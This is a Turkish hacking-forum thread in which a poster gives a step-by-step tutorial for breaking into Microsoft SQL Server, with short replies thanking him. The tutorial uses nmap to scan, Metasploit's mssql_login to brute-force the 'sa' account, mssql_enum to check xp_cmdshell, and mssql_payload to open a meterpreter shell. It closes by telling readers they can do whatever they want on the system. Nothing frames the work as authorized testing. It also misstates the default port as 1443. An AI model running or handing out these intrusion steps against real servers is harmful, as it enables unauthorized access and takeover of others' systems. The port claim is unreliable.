THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Microsoft SQL Server'a Sızalım//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
17-09-2019 00:12
#1
Microsoft SQL Server'a Sızalım//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlere "Microsoft SQL Server'e Sızalım" konusunu göstereceğim. İlk öncelikle başlıklarımıza bakalım ve Microsoft SQL Server'ın ne olduğuna bir bakalım.

Konu Başlıkları
• Microsoft SQL Server Nedir?
• Microsoft SQL Server Neden Kullanılır?
• XP_CMDSHELL NEDİR?
• Microsoft SQL Server'a Sızalım




Microsoft SQL Server Nedir?





Bir websitenin veya bir yazılımın bilgilerinin depolandığı veritabanı sistemidir. MSSQL en çok kullanılan veritabanı tiplerindendir.



Microsoft SQL Server Neden Kullanılır?

MSSQL Windows makineler üzerinde .NET ve .ASP ile yazılmış web sitelerinin ve yazılımlarının veritabanı olarak kullanılır.




XP_CMDSHELL NEDİR?

SQL Server da cmd komut satırını kullanmamıza yarayan bir araçtır. Bu özellik ile cmd komut satırında yapabildiğimiz her şeyi yapabiliriz.


Bu kadar terimsel anlatım yeter bence Hadi işlemlerimize başlayalım.





Microsoft SQL Server'a Sızalım

Bir cihaz, Microsoft SQL Server 1443 portundan işlem yapmaktadır. Yani bizim için önemli yer burası olacak. Bir port taraması yaparak hedefimizin 1443 portu'nun açık olup olmadığına bakalım. Bu yöntemimiz de Brute yapacağız arkadaşlar o yüzden güzel bir wordlist belirleyiniz.
Bunun için
Kod:
nmap -sS -sV IP_ADRESI
yazalım.



Taramamız gerçekleşti ve 1443 portu açık olduğu gözüküyor. Buradan işlem yapacağız.



Şimdi terminale msfconsole yazalım ve açıldıktan sonra
Kod:
use auxiliary/scanner/mssql/mssql_login
yazalım ve exploite giriş yapalım. Daha sonra ayarlarımızı görmek için
Kod:
show options
yazalım.



Şimdi ayarlarımızı girelim öncelikle port ayarımızı girelim bunun için
Kod:
set RHOSTS IP_ADRESI
yazalım ve kullanıcı adı ve şifre dosyalarını tanımlamak için
Kod:
set USER_FILE DOSYA_YOLU
ve
Kod:
set PASS_FILE DOSYA_YOLU
olarak yazalım ve exploiti başlatmak için
Kod:
exploit
diyelim.



Gördüğünüz gibi Brute yöntemi yaptı ve giriş bilgilerini bizlere gösterdi. Kullanıcı adı sa şifre 1234.

sa : Server Administration(Sunucu Yöneticisi)



Şimdi şifreyi ve kullanıcı adını aldık. Bir de xp_cmdshell'in aktif olup olmadığına bakalım.

xp_cmdshell ne olduğundan bahsetmiştim üstte fakat neden bunu kullanalım ki buradan giriş yapılıyorsa diyorsanız cevabını vereyim. CMD ile yapabildiğimiz her şeyi yapabiliyoruz ve kullanım kolaylığı sağlıyor bizlere.
Şimdi sunucumuzda xp_cmdshell açık mı diye bakalım. Bunun için terminale
Kod:
msfconsole
yazıyoruz ve çıkan ekrana
Kod:
use auxiliary/admin/mssql/mssql_enum
yazalım.



Sonra ayarları yapacağız bunu için ayarlara bakalım
Kod:
show options
yazalım, IP adresini ayarlamak için
Kod:
set RHOST IP_ADRESI
olarak yazalım.
Şifreyi ayarlamak için
Kod:
set PASSWORD 1234
yazalım. (1234'ü brute yönteminden bulmuştuk.) Kullanıcı adı zaten sa olduğu için ellemedim.
exploit diyerek işlemi başlatalım.



Gördüğünüz gibi xp_cmdshell'imiz aktif. "xp_cmdshell" in açık olması demek karşı tarafta shell açabileceğiz demektir.




Shell açmak için terminale yine
Kod:
msfconsole
yazıyoruz. Daha sonra
Kod:
use exploit/windows/mssql/mssql_payload
yazarak exploite giriş yapıyoruz.



Burada yine ayarlarız yapacağız öncelikle IP adresimizi ayarlayalım bunun için
Kod:
set RHOSTS IP_ADRESI
olarak yazıyoruz ve şifreyi ayarlamak için
Kod:
set PASSWORD Şifre
yazıyoruz.

exploit yazarak işlemimizi yapıyoruz.



meterpreter kısmına gelince shell yazarak shelli açıyoruz.



Gördüğünüz gibi sisteme giriş yaptık. Buradan istediğiniz işlemleri yapabilirsiniz.







Konum bu kadardı arkadaşlar başka bir konumda görüşmek üzere sağlıcakla...



"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
17-09-2019 22:51
#2
Cevap: Microsoft SQL Server'a Sızalım//"P4RS
Günceldir.
Uchiha-Sasuke - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.355
Konular:
75
Teşekkür (Etti):
30
Teşekkür (Aldı):
381
Ticaret:
(0) %
17-09-2019 23:09
#3
Cevap: Microsoft SQL Server'a Sızalım//"P4RS
Ellerine sağlık reis, Konu linkini kaydettim Birde bi sorum var Porttan hedefe sızma devamı gelecekmi ?
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".


"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
18-09-2019 19:14
#4
Cevap: Microsoft SQL Server'a Sızalım//"P4RS
Alıntı:
Uchiha-Sasuke´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık reis, Konu linkini kaydettim Birde bi sorum var Porttan hedefe sızma devamı gelecekmi ?
İnşallah gelecek, farklı konularla da karşınızda olacağım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler